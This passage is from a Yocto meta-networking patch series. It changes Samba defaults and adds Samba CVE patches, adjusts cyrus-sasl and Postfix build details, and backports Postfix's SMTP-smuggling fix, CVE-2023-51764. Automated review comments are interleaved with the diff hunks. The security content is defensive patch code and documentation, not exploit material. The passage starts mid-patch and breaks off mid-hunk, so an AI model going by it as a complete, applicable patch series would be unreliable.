+--- a/source3/param/loadparm.c
++++ b/source3/param/loadparm.c
+@@ -879,7 +879,7 @@ static void init_globals(struct loadparm_context *lp_ctx, bool reinit_globals)
+
+ Globals.server_services = str_list_make_v3_const(NULL, "s3fs rpc nbt wrepl ldap cldap kdc drepl winbindd ntp_signd kcc dnsupdate dns", NULL);
+
+- Globals.dcerpc_endpoint_servers = str_list_make_v3_const(NULL, "epmapper wkssvc rpcecho samr netlogon lsarpc drsuapi dssetup unixinfo browser eventlog6 backupkey dnsserver", NULL);
++ Globals.dcerpc_endpoint_servers = str_list_make_v3_const(NULL, "epmapper wkssvc samr netlogon lsarpc drsuapi dssetup unixinfo browser eventlog6 backupkey dnsserver", NULL);
+
+ Globals.tls_enabled = true;
+ Globals.tls_verify_peer = TLS_VERIFY_PEER_AS_STRICT_AS_POSSIBLE;
+diff --git a/source4/rpc_server/wscript_build b/source4/rpc_server/wscript_build
+index 8c75672..a2520da 100644
+--- a/source4/rpc_server/wscript_build
++++ b/source4/rpc_server/wscript_build
+@@ -29,7 +29,8 @@ bld.SAMBA_MODULE('dcerpc_rpcecho',
+ source='echo/rpc_echo.c',
+ subsystem='dcerpc_server',
+ init_function='dcerpc_server_rpcecho_init',
+- deps='ndr-standard events'
++ deps='ndr-standard events',
++ enabled=bld.CONFIG_GET('ENABLE_SELFTEST')
+ )
+
+
+--
+2.40.0
diff --git a/meta-networking/recipes-connectivity/samba/samba_4.14.14.bb b/meta-networking/recipes-connectivity/samba/samba_4.14.14.bb
index 53526a26b6..2fb93be0a9 100644
--- a/meta-networking/recipes-connectivity/samba/samba_4.14.14.bb
+++ b/meta-networking/recipes-connectivity/samba/samba_4.14.14.bb
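Review bot: The context line `<value type="example">rpcecho</value>` in dcerpcendpointservers.xml is left as the documented example, although the same patch drops rpcecho from the default list and builds the dcerpc_rpcecho module only when `ENABLE_SELFTEST` is set. The example should name an endpoint server that is still built in a production image, or the description should gain a sentence saying rpcecho is available in selftest builds only. The patch changes defaults only; an smb.conf that sets `dcerpc endpoint servers` explicitly with rpcecho is not altered, and how the server behaves when that module is absent is not visible in these hunks.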
@@ -22,6 +22,43 @@ SRC_URI = "${SAMBA_MIRROR}/stable/samba-${PV}.tar.gz \ file://0005-samba-build-dnsserver_common-code.patch \ file://0001-Fix-pyext_PATTERN-for-cross-compilation.patch \ file://0001-smbtorture-skip-test-case-tfork_cmd_send.patch \ + file://CVE-2022-3437-0001.patch;patchdir=source4/heimdal \ + file://CVE-2022-3437-0002.patch;patchdir=source4/heimdal \ + file://CVE-2022-3437-0003.patch;patchdir=source4/heimdal \ + file://CVE-2022-3437-0004.patch;patchdir=source4/heimdal \ + file://CVE-2022-3437-0005.patch;patchdir=source4/heimdal \ + file://CVE-2022-3437-0006.patch;patchdir=source4/heimdal \ + file://CVE-2022-3437-0007.patch;patchdir=source4/heimdal \ + file://CVE-2022-3437-0008.patch;patchdir=source4/heimdal \ + file://CVE-2022-45142.patch;patchdir=source4/heimdal \ + file://CVE-2022-41916.patch;patchdir=source4/heimdal \ + file://CVE-2021-44758.patch;patchdir=source4/heimdal \ + file://CVE-2023-34966_0001.patch \ + file://CVE-2023-34966_0002.patch \ + file://CVE-2022-2127.patch \ + file://CVE-2023-34967_0001.patch \ + file://CVE-2023-34967_0002.patch \ + file://CVE-2023-34968_0001.patch \ + file://CVE-2023-34968_0002.patch \ + file://CVE-2023-34968_0003.patch \ + file://CVE-2023-34968_0004.patch \ + file://CVE-2023-34968_0005.patch \ + file://CVE-2023-34968_0006.patch \ + file://CVE-2023-34968_0007.patch \ + file://CVE-2023-34968_0008.patch \ + file://CVE-2023-34968_0009.patch \ + file://CVE-2023-34968_0010.patch \ + file://CVE-2023-34968_0011.patch \ + file://CVE-2023-4091-0001.patch \ + file://CVE-2023-4091-0002.patch \ + file://CVE-2023-42669.patch \ + file://CVE-2018-14628-0001.patch \ + file://CVE-2018-14628-0002.patch \ + file://CVE-2018-14628-0003.patch \ + file://CVE-2018-14628-0004.patch \ + file://CVE-2018-14628-0005.patch \ + file://CVE-2018-14628-0006.patch \ + file://CVE-2023-0922.patch \ " SRC_URI:append:libc-musl = " \ 
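Review bot: The added SRC_URI entries mix two naming schemes, `CVE-2023-34966_0001.patch` with an underscore and `CVE-2023-4091-0001.patch` with a hyphen; one scheme would make the series easier to scan and to match against the files directory. `CVE-2023-4091-0001.patch` has to stay ahead of `CVE-2023-4091-0002.patch`, because the second deletes the selftest/knownfail.d/samba3.smb2.acls file that the first creates, and a short comment above the pair would keep a later reorder from breaking do_patch. The SRC_URI assignment starts above the hunk.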
diff --git a/meta-networking/recipes-daemons/cyrus-sasl/cyrus-sasl_2.1.28.bb b/meta-networking/recipes-daemons/cyrus-sasl/cyrus-sasl_2.1.28.bb index e344733ef4..3fc1b0fd17 100644 --- a/meta-networking/recipes-daemons/cyrus-sasl/cyrus-sasl_2.1.28.bb +++ b/meta-networking/recipes-daemons/cyrus-sasl/cyrus-sasl_2.1.28.bb @@ -73,6 +73,7 @@ do_install:append() { } USERADD_PACKAGES = "${PN}-bin" +GROUPADD_PARAM:${PN}-bin = "--system mail" USERADD_PARAM:${PN}-bin = "--system --home=/var/spool/mail -g mail cyrus" SYSTEMD_PACKAGES = "${PN}-bin" diff --git a/meta-networking/recipes-daemons/postfix/files/0006-makedefs-Account-for-linux-6.x-version.patch b/meta-networking/recipes-daemons/postfix/files/0006-makedefs-Account-for-linux-6.x-version.patch new file mode 100644 index 0000000000..ad1704520c --- /dev/null +++ b/meta-networking/recipes-daemons/postfix/files/0006-makedefs-Account-for-linux-6.x-version.patch 
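Review bot: The new `GROUPADD_PARAM:${PN}-bin = "--system mail"` line has no comment saying why the recipe now declares the group. It appears to exist so that `-g mail` in the USERADD_PARAM line below it resolves when the cyrus user is created, and a one-line comment such as `# cyrus is created with -g mail, so the group must be declared for this package` would record that. Whether another recipe in the image already provides a mail group is not visible here.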
@@ -0,0 +1,35 @@
+From e5ddcf9575437bacd64c2b68501b413014186a6a Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Wed, 19 Oct 2022 10:15:01 -0700
+Subject: [PATCH] makedefs: Account for linux 6.x version
+
+Major version has bumped to 6 and script needs to know that
+
+Upstream-Status: Pending
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ makedefs | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+--- a/makedefs
++++ b/makedefs
+@@ -613,7 +613,7 @@ EOF
+ : ${SHLIB_ENV="LD_LIBRARY_PATH=`pwd`/lib"}
+ : ${PLUGIN_LD="${CC-gcc} -shared"}
+ ;;
+- Linux.[345].*) SYSTYPE=LINUX$RELEASE_MAJOR
++ Linux.[3-6]*) SYSTYPE=LINUX$RELEASE_MAJOR
+ case "$CCARGS" in
+ *-DNO_DB*) ;;
+ *-DHAS_DB*) ;;
+--- a/src/util/sys_defs.h
++++ b/src/util/sys_defs.h
+@@ -751,7 +751,7 @@ extern int initgroups(const char *, int)
+ /*
+ * LINUX.
+ */
+-#if defined(LINUX2) || defined(LINUX3) || defined(LINUX4) || defined(LINUX5)
++#if defined(LINUX2) || defined(LINUX3) || defined(LINUX4) || defined(LINUX5) || defined(LINUX6)
+ #define SUPPORTED
+ #define UINT32_TYPE unsigned int
+ #define UINT16_TYPE unsigned short
diff --git a/meta-networking/recipes-daemons/postfix/files/CVE-2023-51764-1.patch b/meta-networking/recipes-daemons/postfix/files/CVE-2023-51764-1.patch
new file mode 100644
index 0000000000..65436b704e
--- /dev/null
+++ b/meta-networking/recipes-daemons/postfix/files/CVE-2023-51764-1.patch
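Review bot: The new case pattern `Linux.[3-6]*)` in makedefs drops the dot that followed the bracket in `Linux.[345].*)`, so it now matches any release string whose first character is 3 to 6 rather than a single-digit major version followed by a dot. `Linux.[3-6].*) SYSTYPE=LINUX$RELEASE_MAJOR` keeps the original strictness while adding 6. The sys_defs.h hunk has to grow another `defined(LINUXn)` term for each new major as well, so both places will need the same edit again when the major version next changes.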
@@ -0,0 +1,377 @@ +From a6596ec37a4892e1d9c2498ecbfc4b8e6be5156a Mon Sep 17 00:00:00 2001 +From: Wietse Venema <wietse@porcupine.org> +Date: Fri, 22 Dec 2023 00:00:00 -0500 +Subject: [PATCH] postfix-3.6.13 +--- +Upstream-Status: Backport from [https://launchpad.net/ubuntu/+source/postfix/3.6.4-1ubuntu1.3] +CVE: CVE-2023-51764 +Signed-off-by: Ashish Sharma <asharma@mvista.com> + + man/man5/postconf.5 | 55 +++++++++++++++++++++++++++++++++++++++++++++++ + man/man8/smtpd.8 | 9 +++++++ + mantools/postlink | 2 + + proto/postconf.proto | 52 ++++++++++++++++++++++++++++++++++++++++++++ + src/global/mail_params.h | 11 ++++++++- + src/global/smtp_stream.c | 14 +++++++++++ + src/global/smtp_stream.h | 2 + + src/smtpd/smtpd.c | 42 +++++++++++++++++++++++++++++++++++ + 8 files changed, 185 insertions(+), 2 deletions(-) + +--- a/man/man5/postconf.5 ++++ b/man/man5/postconf.5 +@@ -10412,6 +10412,61 @@ + parameter $name expansion. + .PP + This feature is available in Postfix 2.0 and later. ++.SH smtpd_forbid_bare_newline (default: Postfix < 3.9: no) ++Reply with "Error: bare <LF> received" and disconnect ++when a remote SMTP client sends a line ending in <LF>, violating ++the RFC 5321 requirement that lines must end in <CR><LF>. ++This feature is disbled by default with Postfix < 3.9. Use ++smtpd_forbid_bare_newline_exclusions to exclude non\-standard clients ++such as netcat. Specify "smtpd_forbid_bare_newline = no" to disable ++(not recommended for an Internet\-connected MTA). ++.PP ++See ++https://www.postfix.org/smtp\-smuggling.html for details. ++.PP ++Example: ++.sp ++.in +4 ++.nf ++.na ++.ft C ++# Disconnect remote SMTP clients that send bare newlines, but allow ++# local clients with non\-standard SMTP implementations such as netcat, ++# fax machines, or load balancer health checks. 
++# ++smtpd_forbid_bare_newline = yes ++smtpd_forbid_bare_newline_exclusions = $mynetworks ++.fi ++.ad ++.ft R ++.in -4 ++.PP ++This feature is available in Postfix >= 3.9, 3.8.4, 3.7.9, ++3.6.13, and 3.5.23. ++.SH smtpd_forbid_bare_newline_exclusions (default: $mynetworks) ++Exclude the specified clients from smtpd_forbid_bare_newline ++enforcement. It uses the same syntax and parent\-domain matching ++behavior as mynetworks. ++.PP ++Example: ++.sp ++.in +4 ++.nf ++.na ++.ft C ++# Disconnect remote SMTP clients that send bare newlines, but allow ++# local clients with non\-standard SMTP implementations such as netcat, ++# fax machines, or load balancer health checks. ++# ++smtpd_forbid_bare_newline = yes ++smtpd_forbid_bare_newline_exclusions = $mynetworks ++.fi ++.ad ++.ft R ++.in -4 ++.PP ++This feature is available in Postfix >= 3.9, 3.8.4, 3.7.9, ++3.6.13, and 3.5.23. + .SH smtpd_forbidden_commands (default: CONNECT, GET, POST) + List of commands that cause the Postfix SMTP server to immediately + terminate the session with a 221 code. This can be used to disconnect +--- a/man/man8/smtpd.8 ++++ b/man/man8/smtpd.8 +@@ -808,6 +808,15 @@ + The maximal number of AUTH commands that any client is allowed to + send to this service per time unit, regardless of whether or not + Postfix actually accepts those commands. ++.PP ++Available in Postfix 3.9, 3.8.4, 3.7.9, 3.6.13, 3.5.23 and later: ++.IP "\fBsmtpd_forbid_bare_newline (Postfix < 3.9: no)\fR" ++Reply with "Error: bare <LF> received" and disconnect ++when a remote SMTP client sends a line ending in <LF>, violating ++the RFC 5321 requirement that lines must end in <CR><LF>. ++.IP "\fBsmtpd_forbid_bare_newline_exclusions ($mynetworks)\fR" ++Exclude the specified clients from smtpd_forbid_bare_newline ++enforcement. 
+ .SH "TARPIT CONTROLS" + .na + .nf +--- a/mantools/postlink ++++ b/mantools/postlink +@@ -547,6 +547,8 @@ + s;\bsmtpd_error_sleep_time\b;<a href="postconf.5.html#smtpd_error_sleep_time">$&</a>;g; + s;\bsmtpd_etrn_restrictions\b;<a href="postconf.5.html#smtpd_etrn_restrictions">$&</a>;g; + s;\bsmtpd_expansion_filter\b;<a href="postconf.5.html#smtpd_expansion_filter">$&</a>;g; ++ s;\bsmtpd_for[-</bB>]*\n*[ <bB>]*bid_bare_newline\b;<a href="postconf.5.html#smtpd_forbi d_bare_newline">$&</a>;g; ++ s;\bsmtpd_for[-</bB>]*\n*[ <bB>]*bid_bare_newline_exclusions\b;<a href="postconf.5.html# smtpd_forbid_bare_newline_exclusions">$&</a>;g; + s;\bsmtpd_for[-</bB>]*\n*[ <bB>]*bidden_commands\b;<a href="postconf.5.html#smtpd_forbidden_commands">$&</a>;g; + s;\bsmtpd_hard_error_limit\b;<a href="postconf.5.html#smtpd_hard_error_limit">$&</a>;g; + s;\bsmtpd_helo_required\b;<a href="postconf.5.html#smtpd_helo_required">$&</a>;g; +--- a/proto/postconf.proto ++++ b/proto/postconf.proto +@@ -18058,3 +18058,55 @@ + name or port number. </p> + + <p> This feature is available in Postfix 3.6 and later. </p> ++ ++%PARAM smtpd_forbid_bare_newline Postfix < 3.9: no ++ ++<p> Reply with "Error: bare <LF> received" and disconnect ++when a remote SMTP client sends a line ending in <LF>, violating ++the RFC 5321 requirement that lines must end in <CR><LF>. ++This feature is disbled by default with Postfix < 3.9. Use ++smtpd_forbid_bare_newline_exclusions to exclude non-standard clients ++such as netcat. Specify "smtpd_forbid_bare_newline = no" to disable ++(not recommended for an Internet-connected MTA). </p> ++ ++<p> See <a href="https://www.postfix.org/smtp-smuggling.html"> ++https://www.postfix.org/smtp-smuggling.html</a> for details. ++ ++<p> Example: </p> ++ ++<blockquote> ++<pre> ++# Disconnect remote SMTP clients that send bare newlines, but allow ++# local clients with non-standard SMTP implementations such as netcat, ++# fax machines, or load balancer health checks. 
++# ++smtpd_forbid_bare_newline = yes ++smtpd_forbid_bare_newline_exclusions = $mynetworks ++</pre> ++</blockquote> ++ ++<p> This feature is available in Postfix ≥ 3.9, 3.8.4, 3.7.9, ++3.6.13, and 3.5.23. </p> ++ ++%PARAM smtpd_forbid_bare_newline_exclusions $mynetworks ++ ++<p> Exclude the specified clients from smtpd_forbid_bare_newline ++enforcement. It uses the same syntax and parent-domain matching ++behavior as mynetworks. </p> ++ ++<p> Example: </p> ++ ++<blockquote> ++<pre> ++# Disconnect remote SMTP clients that send bare newlines, but allow ++# local clients with non-standard SMTP implementations such as netcat, ++# fax machines, or load balancer health checks. ++# ++smtpd_forbid_bare_newline = yes ++smtpd_forbid_bare_newline_exclusions = $mynetworks ++</pre> ++</blockquote> ++ ++<p> This feature is available in Postfix ≥ 3.9, 3.8.4, 3.7.9, ++3.6.13, and 3.5.23. </p> ++ +--- a/src/global/mail_params.h ++++ b/src/global/mail_params.h +@@ -4170,7 +4170,16 @@ + extern char *var_smtpd_dns_re_filter; + + /* +- * Share TLS sessions through tlproxy(8). ++ * Backwards compatibility. ++ */ ++#define VAR_SMTPD_FORBID_BARE_LF "smtpd_forbid_bare_newline" ++#define DEF_SMTPD_FORBID_BARE_LF 0 ++ ++#define VAR_SMTPD_FORBID_BARE_LF_EXCL "smtpd_forbid_bare_newline_exclusions" ++#define DEF_SMTPD_FORBID_BARE_LF_EXCL "$" VAR_MYNETWORKS ++ ++ /* ++ * Share TLS sessions through tlsproxy(8). + */ + #define VAR_SMTP_TLS_CONN_REUSE "smtp_tls_connection_reuse" + #define DEF_SMTP_TLS_CONN_REUSE 0 +--- a/src/global/smtp_stream.c ++++ b/src/global/smtp_stream.c +@@ -50,6 +50,8 @@ + /* VSTREAM *stream; + /* char *format; + /* va_list ap; ++/* ++/* int smtp_forbid_bare_lf; + /* AUXILIARY API + /* int smtp_get_noexcept(vp, stream, maxlen, flags) + /* VSTRING *vp; +@@ -124,11 +126,16 @@ + /* smtp_vprintf() is the machine underneath smtp_printf(). + /* + /* smtp_get_noexcept() implements the subset of smtp_get() +-/* without timeouts and without making long jumps. 
Instead, ++/* without long jumps for timeout or EOF errors. Instead, + /* query the stream status with vstream_feof() etc. ++/* This function will make a VSTREAM long jump (error code ++/* SMTP_ERR_LF) when rejecting input with a bare newline byte. + /* + /* smtp_timeout_setup() is a backwards-compatibility interface + /* for programs that don't require per-record deadline support. ++/* ++/* smtp_forbid_bare_lf controls whether smtp_get_noexcept() ++/* will reject input with a bare newline byte. + /* DIAGNOSTICS + /* .fi + /* .ad +@@ -201,6 +208,8 @@ + + #include "smtp_stream.h" + ++int smtp_forbid_bare_lf; ++ + /* smtp_timeout_reset - reset per-stream error flags, restart deadline timer */ + + static void smtp_timeout_reset(VSTREAM *stream) +@@ -404,6 +413,9 @@ + */ + case '\n': + vstring_truncate(vp, VSTRING_LEN(vp) - 1); ++ if (smtp_forbid_bare_lf ++ && (VSTRING_LEN(vp) == 0 || vstring_end(vp)[-1] != '\r')) ++ vstream_longjmp(stream, SMTP_ERR_LF); + while (VSTRING_LEN(vp) > 0 && vstring_end(vp)[-1] == '\r') + vstring_truncate(vp, VSTRING_LEN(vp) - 1); + VSTRING_TERMINATE(vp); +--- a/src/global/smtp_stream.h ++++ b/src/global/smtp_stream.h +@@ -32,6 +32,7 @@ + #define SMTP_ERR_QUIET 3 /* silent cleanup (application) */ + #define SMTP_ERR_NONE 4 /* non-error case */ + #define SMTP_ERR_DATA 5 /* application data error */ ++#define SMTP_ERR_LF 6 /* bare <LF> protocol error */ + + extern void smtp_stream_setup(VSTREAM *, int, int); + extern void PRINTFLIKE(2, 3) smtp_printf(VSTREAM *, const char *,...); +@@ -43,6 +44,7 @@ + extern void smtp_fwrite(const char *, ssize_t len, VSTREAM *); + extern void smtp_fread_buf(VSTRING *, ssize_t len, VSTREAM *); + extern void smtp_fputc(int, VSTREAM *); ++extern int smtp_forbid_bare_lf; + + extern void smtp_vprintf(VSTREAM *, const char *, va_list); + +--- a/src/smtpd/smtpd.c ++++ b/src/smtpd/smtpd.c +@@ -762,6 +762,15 @@ + /* The maximal number of AUTH commands that any client is allowed to + /* send to this service per time 
unit, regardless of whether or not + /* Postfix actually accepts those commands. ++/* .PP ++/* Available in Postfix 3.9, 3.8.4, 3.7.9, 3.6.13, 3.5.23 and later: ++/* .IP "\fBsmtpd_forbid_bare_newline (Postfix < 3.9: no)\fR" ++/* Reply with "Error: bare <LF> received" and disconnect ++/* when a remote SMTP client sends a line ending in <LF>, violating ++/* the RFC 5321 requirement that lines must end in <CR><LF>. ++/* .IP "\fBsmtpd_forbid_bare_newline_exclusions ($mynetworks)\fR" ++/* Exclude the specified clients from smtpd_forbid_bare_newline ++/* enforcement. + /* TARPIT CONTROLS + /* .ad + /* .fi +@@ -1467,6 +1476,10 @@ + int var_smtpd_uproxy_tmout; + bool var_relay_before_rcpt_checks; + ++bool var_smtpd_forbid_bare_lf; ++char *var_smtpd_forbid_bare_lf_excl; ++static NAMADR_LIST *bare_lf_excl; ++ + /* + * Silly little macros. + */ +@@ -1541,6 +1554,7 @@ + #define REASON_TIMEOUT "timeout" + #define REASON_LOST_CONNECTION "lost connection" + #define REASON_ERROR_LIMIT "too many errors" ++#define REASON_BARE_LF "bare <LF> received" + + #ifdef USE_TLS + +@@ -3967,6 +3981,7 @@ + */ + done = 0; + do { ++ int payload_err; + + /* + * Do not skip the smtp_fread_buf() call if read_len == 0. We still +@@ -3980,6 +3995,10 @@ + smtp_fread_buf(state->buffer, read_len, state->client); + state->bdat_get_stream = vstream_memreopen( + state->bdat_get_stream, state->buffer, O_RDONLY); ++ vstream_control(state->bdat_get_stream, CA_VSTREAM_CTL_EXCEPT, ++ CA_VSTREAM_CTL_END); ++ if ((payload_err = vstream_setjmp(state->bdat_get_stream)) != 0) ++ vstream_longjmp(state->client, payload_err); + + /* + * Read lines from the fragment. 
The last line may continue in the +@@ -4655,6 +4674,9 @@ + */ + xclient_allowed = + namadr_list_match(xclient_hosts, state->name, state->addr); ++ smtp_forbid_bare_lf = SMTPD_STAND_ALONE((state)) == 0 ++ && var_smtpd_forbid_bare_lf ++ && !namadr_list_match(bare_lf_excl, state->name, state->addr); + /* NOT: tls_reset() */ + if (got_helo == 0) + helo_reset(state); +@@ -5446,6 +5468,13 @@ + var_myhostname); + break; + ++ case SMTP_ERR_LF: ++ state->reason = REASON_BARE_LF; ++ if (vstream_setjmp(state->client) == 0) ++ smtpd_chat_reply(state, "521 5.5.2 %s Error: bare <LF> received", ++ var_myhostname); ++ break; ++ + case 0: + + /* +@@ -5995,6 +6024,13 @@ + namadr_list_match(xforward_hosts, state.name, state.addr); + + /* ++ * Enforce strict SMTP line endings, with compatibility exclusions. ++ */ ++ smtp_forbid_bare_lf = SMTPD_STAND_ALONE((&state)) == 0 ++ && var_smtpd_forbid_bare_lf ++ && !namadr_list_match(bare_lf_excl, state.name, state.addr); ++ ++ /* + * See if we need to turn on verbose logging for this client. + */ + debug_peer_check(state.name, state.addr); +@@ -6055,6 +6091,10 @@ + hogger_list = namadr_list_init(VAR_SMTPD_HOGGERS, MATCH_FLAG_RETURN + | match_parent_style(VAR_SMTPD_HOGGERS), + var_smtpd_hoggers); ++ bare_lf_excl = namadr_list_init(VAR_SMTPD_FORBID_BARE_LF_EXCL, ++ MATCH_FLAG_RETURN ++ | match_parent_style(VAR_MYNETWORKS), ++ var_smtpd_forbid_bare_lf_excl); + + /* + * Open maps before dropping privileges so we can read passwords etc. 
+@@ -6412,6 +6452,7 @@ + VAR_SMTPD_PEERNAME_LOOKUP, DEF_SMTPD_PEERNAME_LOOKUP, &var_smtpd_peername_lookup, + VAR_SMTPD_DELAY_OPEN, DEF_SMTPD_DELAY_OPEN, &var_smtpd_delay_open, + VAR_SMTPD_CLIENT_PORT_LOG, DEF_SMTPD_CLIENT_PORT_LOG, &var_smtpd_client_port_log, ++ VAR_SMTPD_FORBID_BARE_LF, DEF_SMTPD_FORBID_BARE_LF, &var_smtpd_forbid_bare_lf, + 0, + }; + static const CONFIG_NBOOL_TABLE nbool_table[] = { +@@ -6527,6 +6568,7 @@ + VAR_SMTPD_POLICY_CONTEXT, DEF_SMTPD_POLICY_CONTEXT, &var_smtpd_policy_context, 0, 0, + VAR_SMTPD_DNS_RE_FILTER, DEF_SMTPD_DNS_RE_FILTER, &var_smtpd_dns_re_filter, 0, 0, + VAR_SMTPD_REJ_FTR_MAPS, DEF_SMTPD_REJ_FTR_MAPS, &var_smtpd_rej_ftr_maps, 0, 0, ++ VAR_SMTPD_FORBID_BARE_LF_EXCL, DEF_SMTPD_FORBID_BARE_LF_EXCL, &var_smtpd_forbid_bare_lf_excl, 0, 0, + 0, + }; + static const CONFIG_RAW_TABLE raw_table[] = { diff --git a/meta-networking/recipes-daemons/postfix/files/CVE-2023-51764-2.patch b/meta-networking/recipes-daemons/postfix/files/CVE-2023-51764-2.patch new file mode 100644 index 0000000000..e97a088557 --- /dev/null +++ b/meta-networking/recipes-daemons/postfix/files/CVE-2023-51764-2.patch 
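Review bot: `#define DEF_SMTPD_FORBID_BARE_LF 0` in mail_params.h means this backport adds the bare-<LF> check switched off, so an image built with the patch rejects nothing until main.cf sets `smtpd_forbid_bare_newline = yes`. The recipe or its shipped main.cf should either enable it (with `smtpd_forbid_bare_newline_exclusions = $mynetworks`, as in the patch's own example) or document that the CVE tag covers an opt-in control. In mantools/postlink the two added substitutions carry a space inside the href, `#smtpd_forbi d_bare_newline` and `# smtpd_forbid_bare_newline_exclusions`, which looks like a wrapping artefact and would produce anchors that do not resolve. The added documentation also spells `disbled` for `disabled`.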
@@ -0,0 +1,978 @@ +From cb3b1cbda3dec086a7f4541fe64751d9bb2988bd Mon Sep 17 00:00:00 2001 +From: Wietse Venema <wietse@porcupine.org> +Date: Sun, 21 Jan 2024 00:00:00 -0500 +Subject: [PATCH] postfix-3.6.14 + +--- + +Upstream-Status: Backport from [https://launchpad.net/ubuntu/+source/postfix/3.6.4-1ubuntu1.3] +CVE: CVE-2023-51764 +Signed-off-by: Ashish Sharma <asharma@mvista.com> + + man/man5/postconf.5 | 173 +++++++++++++++++++++++++++++++++++------- + man/man8/cleanup.8 | 8 + + man/man8/smtpd.8 | 11 +- + mantools/postlink | 6 - + proto/postconf.proto | 142 +++++++++++++++++++++++++++------- + src/cleanup/cleanup.c | 8 + + src/cleanup/cleanup_init.c | 2 + src/cleanup/cleanup_message.c | 17 ++++ + src/global/cleanup_strerror.c | 1 + src/global/cleanup_user.h | 6 + + src/global/mail_params.h | 9 +- + src/global/smtp_stream.c | 34 +++++--- + src/global/smtp_stream.h | 4 + src/smtpd/smtpd.c | 114 ++++++++++++++++++++------- + src/smtpd/smtpd_check.c | 14 ++- + src/smtpd/smtpd_check.h | 1 + 16 files changed, 443 insertions(+), 107 deletions(-) + +--- a/man/man5/postconf.5 ++++ b/man/man5/postconf.5 +@@ -845,6 +845,32 @@ + .fi + .ad + .ft R ++.SH cleanup_replace_stray_cr_lf (default: yes) ++Replace each stray <CR> or <LF> character in message ++content with a space character, to prevent outbound SMTP smuggling, ++and to make the evaluation of Postfix\-added DKIM or other signatures ++independent from how a remote mail server handles such characters. ++.PP ++SMTP does not allow such characters unless they are part of a ++<CR><LF> sequence, and different mail systems handle ++such stray characters in an implementation\-dependent manner. Stray ++<CR> or <LF> characters could be used for outbound ++SMTP smuggling, where an attacker uses a Postfix server to send ++message content with a non\-standard End\-of\-DATA sequence that ++triggers inbound SMTP smuggling at a remote SMTP server. 
++.PP ++The replacement happens before all other content management, ++and before Postfix may add a DKIM etc. signature; if the signature ++were created first, the replacement could invalidate the signature. ++.PP ++In addition to preventing SMTP smuggling, replacing stray ++<CR> or <LF> characters ensures that the result of ++signature validation by later mail system will not depend on how ++that mail system handles those stray characters in an ++implementation\-dependent manner. ++.PP ++This feature is available in Postfix >= 3.9, 3.8.5, 3.7.10, ++3.6.14, and 3.5.24. + .SH cleanup_service_name (default: cleanup) + The name of the \fBcleanup\fR(8) service. This service rewrites addresses + into the standard form, and performs \fBcanonical\fR(5) address mapping +@@ -10413,60 +10439,153 @@ + .PP + This feature is available in Postfix 2.0 and later. + .SH smtpd_forbid_bare_newline (default: Postfix < 3.9: no) +-Reply with "Error: bare <LF> received" and disconnect +-when a remote SMTP client sends a line ending in <LF>, violating +-the RFC 5321 requirement that lines must end in <CR><LF>. +-This feature is disbled by default with Postfix < 3.9. Use +-smtpd_forbid_bare_newline_exclusions to exclude non\-standard clients +-such as netcat. Specify "smtpd_forbid_bare_newline = no" to disable +-(not recommended for an Internet\-connected MTA). +-.PP +-See +-https://www.postfix.org/smtp\-smuggling.html for details. ++Reject or restrict input lines from an SMTP client that end in ++<LF> instead of the standard <CR><LF>. Such line ++endings are commonly allowed with UNIX\-based SMTP servers, but they ++violate RFC 5321, and allowing such line endings can make a server ++vulnerable to ++SMTP smuggling. ++.PP ++Specify one of the following values (case does not matter): ++.IP "\fBnormalize\fR" ++Require the standard ++End\-of\-DATA sequence <CR><LF>.<CR><LF>. 
++Otherwise, allow command or message content lines ending in the ++non\-standard <LF>, and process them as if the client sent the ++standard <CR><LF>. ++.br ++.br ++This maintains compatibility ++with many legitimate SMTP client applications that send a mix of ++standard and non\-standard line endings, but will fail to receive ++email from client implementations that do not terminate DATA content ++with the standard End\-of\-DATA sequence ++<CR><LF>.<CR><LF>. ++.br ++.br ++Such clients ++can be excluded with smtpd_forbid_bare_newline_exclusions. ++.br ++.IP "\fByes\fR" ++Compatibility alias for \fBnormalize\fR. ++.br ++.IP "\fBreject\fR" ++Require the standard End\-of\-DATA ++sequence <CR><LF>.<CR><LF>. Reject a command ++or message content when a line contains bare <LF>, log a "bare ++<LF> received" error, and reply with the SMTP status code in ++$smtpd_forbid_bare_newline_reject_code. ++.br ++.br ++This will reject ++email from SMTP clients that send any non\-standard line endings ++such as web applications, netcat, or load balancer health checks. ++.br ++.br ++This will also reject email from services that use BDAT ++to send MIME text containing a bare newline (RFC 3030 Section 3 ++requires canonical MIME format for text message types, defined in ++RFC 2045 Sections 2.7 and 2.8). ++.br ++.br ++Such clients can be ++excluded with smtpd_forbid_bare_newline_exclusions (or, in the case ++of BDAT violations, BDAT can be selectively disabled with ++smtpd_discard_ehlo_keyword_address_maps, or globally disabled with ++smtpd_discard_ehlo_keywords). ++.br ++.IP "\fBno\fR (default)" ++Do not require the standard ++End\-of\-DATA ++sequence <CR><LF>.<CR><LF>. Always process ++a bare <LF> as if the client sent <CR><LF>. This ++option is fully backwards compatible, but is not recommended for ++an Internet\-facing SMTP server, because it is vulnerable to SMTP smuggling. 
++.br ++.br + .PP +-Example: ++Recommended settings: + .sp + .in +4 + .nf + .na + .ft C +-# Disconnect remote SMTP clients that send bare newlines, but allow +-# local clients with non\-standard SMTP implementations such as netcat, +-# fax machines, or load balancer health checks. ++# Require the standard End\-of\-DATA sequence <CR><LF>.<CR><LF>. ++# Otherwise, allow bare <LF> and process it as if the client sent ++# <CR><LF>. + # +-smtpd_forbid_bare_newline = yes ++# This maintains compatibility with many legitimate SMTP client ++# applications that send a mix of standard and non\-standard line ++# endings, but will fail to receive email from client implementations ++# that do not terminate DATA content with the standard End\-of\-DATA ++# sequence <CR><LF>.<CR><LF>. ++# ++# Such clients can be allowlisted with smtpd_forbid_bare_newline_exclusions. ++# The example below allowlists SMTP clients in trusted networks. ++# ++smtpd_forbid_bare_newline = normalize + smtpd_forbid_bare_newline_exclusions = $mynetworks + .fi + .ad + .ft R + .in -4 + .PP +-This feature is available in Postfix >= 3.9, 3.8.4, 3.7.9, +-3.6.13, and 3.5.23. +-.SH smtpd_forbid_bare_newline_exclusions (default: $mynetworks) +-Exclude the specified clients from smtpd_forbid_bare_newline +-enforcement. It uses the same syntax and parent\-domain matching +-behavior as mynetworks. +-.PP +-Example: ++Alternative: + .sp + .in +4 + .nf + .na + .ft C +-# Disconnect remote SMTP clients that send bare newlines, but allow +-# local clients with non\-standard SMTP implementations such as netcat, +-# fax machines, or load balancer health checks. ++# Reject input lines that contain <LF> and log a "bare 